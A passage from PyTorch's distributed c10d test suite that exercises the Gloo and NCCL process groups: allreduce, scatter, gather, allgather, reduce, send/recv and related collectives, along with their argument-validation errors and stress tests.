opts = c10d.AllreduceOptions()
pg.allreduce([t1, t3], opts)
def _test_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Single input tests
tests = simple_reduce_tests(self.rank, self.world_size)
for (op, input, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensor = fn(input)
work = pg.allreduce([tensor], opts)
work.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Multi input tests
tests = simple_multi_input_reduce_tests(self.rank, self.world_size)
for (op, inputs, output) in tests:
opts = c10d.AllreduceOptions()
opts.reduceOp = op
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors, opts)
work.wait()
for tensor in tensors:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tensor)
# Test overloaded convenience function (defaults to using sum)
x = fn(torch.tensor([self.rank + 1.0]))
work = pg.allreduce(x)
work.wait()
self.assertEqual(
torch.tensor([float(self.world_size * (self.world_size + 1) / 2)]), x
)
def test_allreduce_basics(self):
self._test_allreduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allreduce_basics_cuda(self):
self._test_allreduce_basics(lambda t: t.clone().cuda())
def _test_allreduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce(inputs[i]) for i in range(len(inputs))]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
inputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allreduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allreduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_allreduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allreduce_stress(inputs)
def test_allreduce_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
t2 = torch.zeros(1, dtype=torch.float64)
t3 = torch.sparse_coo_tensor([[0]], [1], size=(1,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([], opts)
with self.assertRaisesRegex(ValueError, "tensors must all have the same type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout at index"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1, t3], opts)
with self.assertRaisesRegex(ValueError, "unsupported layout"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t3, t3.clone()], opts)
@skip_if_lt_x_gpu(1)
def test_allreduce_coalesced_checks_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros(1, dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "unsupported device type"):
opts = c10d.AllreduceCoalescedOptions()
pg.allreduce_coalesced([t1.cuda(), t1.cuda()], opts)
def _test_allreduce_coalesced_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
test_cases = simple_coalesced_reduce_tests(self.rank, self.world_size)
for op, inputs, outputs in test_cases:
opts = c10d.AllreduceCoalescedOptions()
opts.reduceOp = op
tensors = [fn(x) for x in inputs]
work = pg.allreduce_coalesced(tensors, opts)
work.wait()
for result_tensor, expected in zip(tensors, outputs):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(result_tensor, expected)
def test_allreduce_coalesced_basics(self):
self._test_allreduce_coalesced_basics(lambda t: t.clone())
def _test_allreduce_coalesced_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = [pg.allreduce_coalesced(input) for input in inputs]
for i, work_handle in enumerate(work_handles):
work_handle.wait()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
2
* [
torch.tensor(
[
(i * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
)
],
inputs[i],
msg="Mismatch in interation {}".format(i),
)
def test_allreduce_coalesced_stress(self):
inputs = [2 * [torch.tensor([i + self.rank])] for i in range(1000)]
self._test_allreduce_coalesced_stress(inputs)
def test_sparse_allreduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1])
t2 = torch.sparse_coo_tensor([[0]], [1], size=(2,))
t3 = torch.sparse_coo_tensor([[0]], [1], size=(4,))
with self.assertRaisesRegex(ValueError, "requires non-empty tensor list"):
opts = c10d.AllreduceOptions()
pg.allreduce([], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor layout"):
opts = c10d.AllreduceOptions()
pg.allreduce([t1, t2], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.AllreduceOptions()
pg.allreduce([t2, t3], opts)
# Sparse allreduce only works with c10d.ReduceOp.SUM.
for op in [c10d.ReduceOp.PRODUCT, c10d.ReduceOp.MIN, c10d.ReduceOp.MAX]:
with self.assertRaisesRegex(ValueError, "unsupported reduction operation"):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
pg.allreduce([t3], opts)
def _test_sparse_allreduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for num_inputs_per_rank in [1, 2]:
tests = simple_sparse_reduce_tests(
self.rank, self.world_size, num_inputs=num_inputs_per_rank
)
for (inputs, outputs) in tests:
tensors = [fn(input) for input in inputs]
work = pg.allreduce(tensors)
work.wait()
self.assertEqual(tensors, outputs)
self.assertEqual(work.result(), outputs)
def test_sparse_allreduce_basics(self):
self._test_sparse_allreduce_basics(lambda t: t)
@skip_if_lt_x_gpu(2)
def test_sparse_allreduce_basics_cuda(self):
self._test_sparse_allreduce_basics(lambda t: t.clone().cuda())
def test_scatter_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = -1
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ScatterOptions()
opts.rootRank = self.world_size
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output tensor list"
):
opts = c10d.ScatterOptions()
opts.rootRank = 0
pg.scatter([t1, t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [], opts)
with self.assertRaisesRegex(ValueError, "requires a single-element input list"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * self.world_size, [t1] * self.world_size], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect input list size {}. Input list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t1] * incorrect_list_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t2] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.ScatterOptions()
opts.rootRank = self.rank
pg.scatter([t1], [[t3] * self.world_size], opts)
with self.assertRaisesRegex(ValueError, "requires empty input on non-root"):
opts = c10d.ScatterOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.scatter([t1], [[t1] * self.world_size], opts)
def _test_scatter_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank])) for _ in range(self.world_size)]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the scatter root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.scatter([outputs[i]], [input], opts))
else:
work.append(pg.scatter([outputs[i]], [], opts))
# Wait for work to complete
for i in range(self.world_size):
work[i].wait()
self.assertEqual(torch.tensor([i]), outputs[i])
def test_scatter_basics(self):
self._test_scatter_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_scatter_basics_cuda(self):
self._test_scatter_basics(lambda t: t.clone().cuda())
def _test_scatter_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
outputs = [
[fn(torch.tensor([-1])) for _ in range(self.world_size)]
for _ in range(len(inputs))
]
work_handles = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ScatterOptions()
opts.rootRank = root
if root == self.rank:
work = pg.scatter(
[outputs[i][root]], [[fn(e) for e in inputs[i]]], opts
)
else:
work = pg.scatter([outputs[i][root]], [], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
self.assertEqual(
torch.tensor([iter + root]),
outputs[iter][root],
msg=("Mismatch in iteration %d for rank %d" % (iter, root)),
)
def test_scatter_stress(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone())
@unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/15963")
@skip_if_lt_x_gpu(2)
def test_scatter_stress_cuda(self):
inputs = [
[torch.tensor([i + self.rank]) for _ in range(self.world_size)]
for i in range(1000)
]
self._test_scatter_stress(inputs, lambda t: t.clone().cuda())
def test_gather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = -1
pg.gather([], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.GatherOptions()
opts.rootRank = self.world_size
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element input tensor list"
):
opts = c10d.GatherOptions()
opts.rootRank = 0
pg.gather([], [t1, t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([], [t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element output list"
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * self.world_size, [t1] * self.world_size], [t1], opts)
desired_list_size = self.world_size
incorrect_list_size = self.world_size - 1
err_str = "Incorrect output list size {}. Output list size should be {}"
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
incorrect_list_size = self.world_size + 1
with self.assertRaisesRegex(
ValueError, err_str.format(incorrect_list_size, desired_list_size)
):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t1] * incorrect_list_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t2] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
opts = c10d.GatherOptions()
opts.rootRank = self.rank
pg.gather([[t3] * self.world_size], [t1], opts)
with self.assertRaisesRegex(ValueError, "requires empty output on non-root"):
opts = c10d.GatherOptions()
opts.rootRank = (self.rank + 1) % self.world_size
pg.gather([[t1] * self.world_size], [t1], opts)
def _test_gather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
input = [fn(torch.tensor([self.rank]))]
outputs = [fn(torch.tensor([-1])) for _ in range(self.world_size)]
# Take turns being the gather root and accumulate work items
work = []
for i in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = i
if i == self.rank:
work.append(pg.gather([outputs], input, opts))
else:
work.append(pg.gather([], input, opts))
# Wait for work to complete
expected = [torch.tensor([rank]) for rank in range(self.world_size)]
for i in range(self.world_size):
work[i].wait()
if i == self.rank:
self.assertEqual(expected, outputs)
def test_gather_basics(self):
self._test_gather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_basics_cuda(self):
self._test_gather_basics(lambda t: t.clone().cuda())
def _test_gather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.GatherOptions()
opts.rootRank = root
if root == self.rank:
work = pg.gather(outputs[i], [fn(inputs[i])], opts)
else:
work = pg.gather([], [fn(inputs[i])], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
self.assertEqual(
expected_outputs[iter],
outputs[iter],
msg=("Mismatch in iteration %d for root %d" % (iter, root)),
)
def test_gather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_gather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_gather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
t2 = torch.zeros([1], dtype=torch.float64)
t3 = torch.zeros([2], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "requires non-empty input tensor list"):
pg.allgather([], [])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([], [t1])
with self.assertRaisesRegex(
ValueError, "requires input/output tensor lists to have the same length"
):
pg.allgather([[t1] * self.world_size, [t1] * self.world_size], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size - 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid output tensor list"):
pg.allgather([[t1] * (self.world_size + 1)], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t2]
)
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather(
[[t1, t1] * (self.world_size), [t1, t1] * (self.world_size)], [t1, t3]
)
with self.assertRaisesRegex(ValueError, "invalid tensor type"):
pg.allgather([([t1, t2] * (self.world_size))[: self.world_size]], [t1])
with self.assertRaisesRegex(ValueError, "invalid tensor size"):
pg.allgather([([t1, t3] * (self.world_size))[: self.world_size]], [t1])
def _test_allgather_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
        # Run with N input tensors per rank
for n in [1, 2, 3]:
input = [fn(torch.tensor([n * self.rank + i])) for i in range(n)]
output = [
[fn(torch.tensor([-1])) for _ in range(n * self.world_size)]
for _ in range(n)
]
expected_output = [
[torch.tensor([i]) for i in range(n * self.world_size)]
for _ in range(n)
]
work = pg.allgather(output, input)
work.wait()
self.assertEqual(expected_output, output)
def test_allgather_basics(self):
self._test_allgather_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_basics_cuda(self):
self._test_allgather_basics(lambda t: t.clone().cuda())
def _test_allgather_stress(self, inputs, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = [
[[fn(torch.tensor([-1])) for _ in range(self.world_size)]]
for _ in range(len(inputs))
]
expected_outputs = [
[[torch.tensor([i + j]) for j in range(self.world_size)]]
for i in range(len(inputs))
]
for i in range(len(inputs)):
work = pg.allgather(outputs[i], [fn(inputs[i])])
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
self.assertEqual(
expected_outputs[i],
outputs[i],
msg=("Mismatch in iteration %d" % i),
)
def test_allgather_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_allgather_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_allgather_stress(inputs, lambda t: t.clone().cuda())
def test_allgather_coalesced_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
dummy_input = [torch.zeros([1], dtype=torch.float32)]
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size)
]
        # One of the output tensors has the wrong size.
dummy_output_lists[0] = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
ValueError, "invalid size of output tensor at index 0"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
        # One of the output tensors has the wrong dtype.
dummy_output_lists[0] = [torch.zeros([1], dtype=torch.float64)]
with self.assertRaisesRegex(ValueError, "invalid tensor type at index 0"):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output lists have too many elements
dummy_output_lists = [
[torch.zeros([1], dtype=torch.float32)] for _ in range(self.world_size + 1)
]
with self.assertRaisesRegex(
ValueError, "output lists should be equal to world size"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
# Output is not a list of lists.
dummy_output_lists = [torch.zeros([0], dtype=torch.float32)]
with self.assertRaisesRegex(
RuntimeError, "Invalid function argument.*output_tensor_lists"
):
c10d.all_gather_coalesced(dummy_output_lists, dummy_input, pg)
def test_reduce_checks(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
t1 = torch.zeros([1], dtype=torch.float32)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = -1
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root rank"):
opts = c10d.ReduceOptions()
opts.rootRank = self.world_size
opts.rootTensor = 0
pg.reduce([t1], opts)
with self.assertRaisesRegex(ValueError, "invalid root tensor"):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 1
pg.reduce([t1], opts)
with self.assertRaisesRegex(
ValueError, "requires a single-element tensor list"
):
opts = c10d.ReduceOptions()
opts.rootRank = self.rank
opts.rootTensor = 0
pg.reduce([t1, t1], opts)
def _test_reduce_basics(self, fn):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
for (op, input, output) in simple_reduce_tests(self.rank, self.world_size):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.reduceOp = op
opts.rootRank = root
tmp = fn(input)
work = pg.reduce([tmp], opts)
work.wait()
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output, tmp)
def test_reduce_basics(self):
self._test_reduce_basics(lambda t: t.clone())
@skip_if_lt_x_gpu(2)
def test_reduce_basics_cuda(self):
self._test_reduce_basics(lambda t: t.clone().cuda())
def _test_reduce_stress(self, inputs):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, self.opts(threads=8)
)
work_handles = []
outputs = []
for i in range(len(inputs)):
for root in range(self.world_size):
opts = c10d.ReduceOptions()
opts.rootRank = root
tmp = inputs[i].clone()
outputs.append(tmp)
work = pg.reduce([tmp], opts)
work_handles.append(work)
for i, work_handle in enumerate(work_handles):
work_handle.wait()
iter = i // self.world_size
root = i % self.world_size
if root == self.rank:
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor(
[
(iter * self.world_size)
+ (self.world_size * (self.world_size - 1) / 2)
]
),
outputs[i],
msg=("Mismatch in iteration %d with root rank %d" % (iter, root)),
)
def test_reduce_stress(self):
inputs = [torch.tensor([i + self.rank]) for i in range(1000)]
self._test_reduce_stress(inputs)
@skip_if_lt_x_gpu(2)
def test_reduce_stress_cuda(self):
inputs = [torch.tensor([i + self.rank]).cuda() for i in range(1000)]
self._test_reduce_stress(inputs)
def test_send_recv_all_to_all(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Preallocate tensors for input/output
inputs = [torch.tensor([self.rank]) for _ in range(self.world_size)]
outputs = [torch.tensor([-1]) for _ in range(self.world_size)]
# Issue sends
send_work = []
for i in range(self.world_size):
if i == self.rank:
continue
send_work.append(pg.send([inputs[i]], i, 0))
# Issue recvs
recv_work = []
for i in range(self.world_size):
if i == self.rank:
continue
recv_work.append(pg.recv([outputs[i]], i, 0))
# Wait for sends to complete
for work in send_work:
work.wait()
self.assertTrue(work.is_completed())
# Wait for recvs to complete
for work in recv_work:
work.wait()
self.assertTrue(work.is_completed())
# Test that every output other than our own contains the respective rank
for i in range(self.world_size):
if i == self.rank:
continue
self.assertEqual(torch.tensor([i]), outputs[i])
def test_barrier_implies_wait(self):
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d.ProcessGroupGloo(store, self.rank, self.world_size, self.opts())
# Kick off allreduce operations
size = (100, 100)
num = 16
tensors = [torch.full(size, float(i)) for i in range(num)]
for tensor in tensors:
# Note: leak the returned work handle
pg.allreduce(tensor)
# Barrier should ensure all previous work has completed
pg.barrier().wait()
for i, tensor in enumerate(tensors):
self.assertEqual(torch.full(size, float(i * self.world_size)), tensor)
@skip_if_win32()
def test_round_robin(self):
num_process_groups = 2
store = c10d.FileStore(self.file_name, self.world_size)
pg = c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore(str(i), store), self.rank, self.world_size, self.opts()
)
for i in range(num_process_groups)
]
)
# Run a few collectives so that we have called each process group
for _ in range(num_process_groups + 1):
tensor = torch.full([100, 100], float(self.rank))
pg.broadcast(tensor, root=0).wait()
self.assertEqual(torch.full([100, 100], 0.0), tensor)
@skip_if_win32()
def test_round_robin_create_destroy(self):
store = c10d.FileStore(self.file_name, self.world_size)
def create(num, prefix):
return c10d._round_robin_process_groups(
[
c10d.ProcessGroupGloo(
c10d.PrefixStore("%s/%d" % (prefix, i), store),
self.rank,
self.world_size,
self.opts()
)
for i in range(num)
]
)
# Run create/use/destroy twice
for i in range(2):
num_process_groups = 2
pg = create(num=num_process_groups, prefix=i)
for _ in range(3):
tensor = torch.ones([10, 10])
pg.allreduce(tensor).wait()
self.assertEqual(torch.full([10, 10], float(self.world_size)), tensor)
del pg
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus > 0:
raise unittest.SkipTest("GPUs are available, skipping test")
def tearDown(self):
pass
@requires_nccl()
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
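# Collective tests against the NCCL process group backend; requires 2+ GPUs.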
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
self.num_gpus = torch.cuda.device_count()
if self.num_gpus < 2:
raise unittest.SkipTest("NCCL test requires 2+ GPUs")
        # NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, so tests that
        # use NCCL_BLOCKING_WAIT will still test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
def tearDown(self):
pass
@requires_nccl()
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
